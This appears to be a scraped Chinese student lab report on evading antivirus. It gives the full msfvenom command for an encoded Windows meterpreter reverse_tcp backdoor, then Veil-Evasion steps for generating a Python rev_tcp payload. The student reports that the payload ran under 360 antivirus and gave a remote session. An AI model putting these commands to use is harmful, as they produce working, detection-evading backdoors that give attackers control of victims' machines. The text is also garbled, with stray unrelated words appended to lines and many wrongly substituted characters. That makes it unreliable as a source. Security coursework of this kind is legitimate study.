(1)理解免杀技术原理python
(2)正确使用msf编码器,veil-evasion,本身利用shellcode编程等免杀工具或技巧;shell
(3)经过组合应用各类技术实现恶意代码免杀编程
(4)用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本windows
(1)杀软是如何检测出恶意代码的?数组
(2)免杀是作什么?安全
(3)免杀的基本方法有哪些?网络
有18个杀毒软件查出来了。扫描结果:46%的杀软(18/39)报告发现病毒tcp
Kali输入命令工具
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口号 -f exe >本身起后门名字.exe
再次学习
在Kali中安装veil,sudo apt-get install veil
Veil-Evasion
veil
,后在veil
中输入命令use evasion
use python/meterpreter/rev_tcp.py(设置payload)
set LHOST Kali的IP(设置反弹链接IP)
set LPORT 端口号(设置反弹端口)
generate 可执行文件名
选择使用语言来编写
按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装360 )的状况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限
经过本次实验让我进一步了解了病毒的可怕,居然都能经过360的检查,真是太恐怖了。仍是本身作的颇有成就感!但愿在之后的学习中可以更多的学到这些知识。